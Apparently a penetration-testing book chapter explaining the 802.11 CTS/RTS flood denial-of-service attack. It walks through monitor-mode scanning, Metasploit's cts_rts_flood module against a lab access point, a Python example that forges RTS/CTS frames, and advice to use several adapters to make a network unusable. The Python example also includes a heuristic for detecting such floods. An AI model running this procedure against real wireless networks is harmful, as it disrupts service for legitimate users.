The Metasploit CTS/RTS flood attack

In a wireless medium, collisions degrade the performance of the network. To avoid them, wireless clients and access points can exchange Request to Send (RTS) and Clear to Send (CTS) control frames before transmitting data. When a wireless client wants to send data, it reserves the medium by sending an RTS frame, and the access point answers with a CTS frame. Both frames carry a Duration field; every other station that hears them sets its Network Allocation Vector (NAV) and defers for that long. In simple terms, the sender announces that it is about to transmit and asks everyone else to wait, and the other stations respect the announcement until the transfer is complete. Because these frames are neither authenticated nor encrypted, an attacker can forge them to create a denial of service condition on the target network.

By continuously sending RTS/CTS frames on the wireless network, the attacker keeps re-reserving the medium, so the other stations sit idle. In practice, this does not usually take the network down outright; it degrades the performance of the target network, which can be harder for an administrator to identify and troubleshoot than a complete outage.

In this attack scenario, we scan the air for access points and then perform a CTS/RTS flood attack against the target wireless network.

Follow these steps to perform a CTS/RTS flood attack using Metasploit:

  1. Set up the wireless card for scanning: bring the card up, then create a monitor mode interface on it. Run the following command to bring the card up:
    #ifconfig wlan0 up
    
  2. Then, run the following command to create the monitor mode interface:
    #airmon-ng start wlan0
    
    airmon-ng reports the name of the monitor interface it created; in our lab it is mon0.

  3. Use the monitor interface to determine the access points in range that will be targeted:
    #airodump-ng mon0
    

airodump-ng hops across all 14 channels of the 2.4 GHz band and lists the identified access points along with their pertinent details (BSSID, channel, encryption, and so on). Note the MAC address (BSSID) of the router we use in our lab. In this case, it is up and running on channel 10 with the SSID Seclab. The encryption and authentication used on the lab router is WPA2 CCMP PSK.

Note

Since RTS and CTS are control frames, which 802.11 never encrypts or authenticates (even the protected management frames of 802.11w do not cover control frames), the security protocol used by the target wireless network, WPA2 CCMP in our lab, has no bearing on the feasibility of this attack.

The airodump-ng output also shows that the wireless client with the MAC address cc:b2:55:ff:2e:1c is connected to the access point Seclab with the MAC address 90:94:e4:c8:04:e8.

To perform a denial of service attack on the target network, we can send CTS/RTS frames to the wireless devices from Metasploit. As with the other Metasploit-based wireless attacks, you will need the lorcon2 packet injection package already installed on Kali.

The Metasploit setup for an RTS-CTS attack

This attack is set up in a fashion similar to the other deauthentication flood attacks used with the Metasploit framework. To be successful, you will also need the lorcon2 packet injection libraries; refer to the example on downloading and configuring them under the Metasploit's fake beacon flood attack section. In this attack, we use the information collected during wireless identification to target and flood the network with CTS/RTS frames. This causes the clients to yield to the attacker, which results in slower transmission speeds and degraded network performance. To flood the target network with CTS/RTS frames, we use the Metasploit auxiliary module named auxiliary/dos/wifi/cts_rts_flood.

Once the module is selected in msfconsole, show options lists its available options.

Now, follow the steps listed here:

  1. Run Metasploit:
    #msfconsole
    
  2. Go to the Windows machine. Ping the access point continuously using the following command:
    ping router_ip -t
    
  3. From the attacker machine, use the auxiliary/dos/wifi/cts_rts_flood auxiliary module inside Metasploit:
    msf> use auxiliary/dos/wifi/cts_rts_flood
    msf> set ADDR_DST 90:94:e4:c8:04:e8
    msf> set TYPE CTS
    msf> set NUM 10000
    msf> set CHANNEL 10
    msf> run
    

In this example, ADDR_DST is the MAC address of the access point targeted by the attack, and TYPE tells the module which frame type to send, either RTS (Request to Send) or CTS (Clear to Send). NUM is the number of frames to send, and CHANNEL must match the channel on which airodump-ng found the access point (10 for our lab router). With the options set, run the module.
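To make the reservation mechanism described at the start of this section and the module's ADDR_DST/TYPE/NUM settings concrete, the following added example (not code from the book or from the Metasploit module) builds RTS and CTS control frames byte by byte, parses them back, and runs two simple checks over a constructed capture: how much medium time the Duration fields claim within a window, and which CTS frames were never preceded by a matching RTS. The frame layouts (RTS: FC, Duration, RA, TA, FCS; CTS: FC, Duration, RA, FCS) are from IEEE 802.11. The access point and client MAC addresses are the lab values from this chapter; the "capture" is constructed inline and contains no radiotap header.

```python
"""Build, parse and sanity-check 802.11 RTS/CTS control frames.

Added example for this chapter (not the book's or Metasploit's code). Frame
layouts follow IEEE 802.11: RTS = FC(2) Duration(2) RA(6) TA(6) FCS(4);
CTS = FC(2) Duration(2) RA(6) FCS(4). The sample capture is constructed.
"""
import struct
import zlib

# Frame Control byte 0 = (subtype << 4) | (type << 2) | version.
FC_RTS = 0xB4             # type 1 (control), subtype 11
FC_CTS = 0xC4             # type 1 (control), subtype 12
MAX_DURATION_US = 0x7FFF  # bit 15 must be 0; 32,767 us is the largest NAV a frame can claim


def _mac(mac):
    return bytes.fromhex(mac.replace(":", ""))


def _mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _fcs(body):
    # The 802.11 FCS is CRC-32 with the Ethernet polynomial, transmitted little-endian.
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def build_cts(ra, duration_us):
    """CTS frame addressed to RA, asking every listener to defer for duration_us."""
    if not 0 <= duration_us <= MAX_DURATION_US:
        raise ValueError("duration must fit in 15 bits")
    body = struct.pack("<BBH", FC_CTS, 0, duration_us) + _mac(ra)
    return body + _fcs(body)


def build_rts(ra, ta, duration_us):
    """RTS frame from TA to RA."""
    if not 0 <= duration_us <= MAX_DURATION_US:
        raise ValueError("duration must fit in 15 bits")
    body = struct.pack("<BBH", FC_RTS, 0, duration_us) + _mac(ra) + _mac(ta)
    return body + _fcs(body)


def parse_control_frame(frame):
    """Decode an RTS or CTS frame into a dict; return None for anything else."""
    if len(frame) < 14:
        return None
    fc0, _flags, duration = struct.unpack_from("<BBH", frame, 0)
    if fc0 == FC_CTS and len(frame) == 14:
        info = {"kind": "CTS", "ra": _mac_str(frame[4:10]), "ta": None}
    elif fc0 == FC_RTS and len(frame) == 20:
        info = {"kind": "RTS", "ra": _mac_str(frame[4:10]), "ta": _mac_str(frame[10:16])}
    else:
        return None
    info["duration_us"] = duration & 0x7FFF
    info["fcs_ok"] = _fcs(frame[:-4]) == frame[-4:]
    return info


def nav_load(frames, window_us):
    """Fraction of a window that the frames' Duration fields try to reserve.

    Every station that hears a frame sets its NAV for the Duration value, so a
    load above 1.0 means the medium is claimed for longer than the window itself.
    """
    return sum(f["duration_us"] for f in frames) / window_us


def unsolicited_cts(frames):
    """CTS frames whose RA never appeared as the TA of an earlier RTS.

    A legitimate CTS answers an RTS, so its RA equals that RTS's TA. A stream of
    CTS frames with no matching RTS is what a forged flood looks like on the air.
    """
    rts_senders, suspects = set(), []
    for f in frames:
        if f["kind"] == "RTS":
            rts_senders.add(f["ta"])
        elif f["kind"] == "CTS" and f["ra"] not in rts_senders:
            suspects.append(f)
    return suspects


# Constructed capture: one legitimate exchange between the lab client and access
# point, then a burst of forged CTS frames addressed to the AP (TYPE CTS,
# ADDR_DST = AP) with the maximum Duration.
AP = "90:94:e4:c8:04:e8"
CLIENT = "cc:b2:55:ff:2e:1c"
SAMPLE_CAPTURE = [
    build_rts(AP, CLIENT, 300),  # client asks to send
    build_cts(CLIENT, 250),      # AP clears it
] + [build_cts(AP, MAX_DURATION_US) for _ in range(50)]  # the flood


def analyse(capture, window_us):
    parsed = [p for p in (parse_control_frame(f) for f in capture) if p]
    return {
        "frames": len(parsed),
        "bad_fcs": sum(not p["fcs_ok"] for p in parsed),
        "nav_load": nav_load(parsed, window_us),
        "unsolicited_cts": len(unsolicited_cts(parsed)),
    }


if __name__ == "__main__":
    # Pretend the burst above spanned one second of air time.
    print(analyse(SAMPLE_CAPTURE, window_us=1_000_000))
```

Fifty forged CTS frames in one second already claim 1.6 seconds of medium time, which is why the ping latency in the Windows output rises rather than the client dropping off: the client is still associated, it just keeps deferring. At the module's NUM 10000 with the maximum Duration, the flood claims roughly 327 seconds of reservation in total. The unsolicited-CTS heuristic needs a rate threshold before it is used for detection, because CTS-to-self (a CTS whose RA is the sender's own address) is a legitimate 802.11g protection mechanism and will show up without any RTS.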


You can see that the wireless client does not lose its connection, but the round-trip time to the access point increases during the CTS flood attack. The ping output on the Windows machine confirms this.

To increase the effectiveness of this attack, you can use multiple hosts and wireless adapters, all targeting the same network with CTS and RTS frames. This can slow the network enough that it becomes unusable for the legitimately connected clients.

The attack summary

In this attack, we scanned for wireless access points and, once one was found, performed a CTS/RTS flood attack against the target network. The forged frames tell the legitimately connected clients that the medium is busy and that they must wait before transmitting. The result is degraded performance for the connected clients, to the point where the network may become unusable.
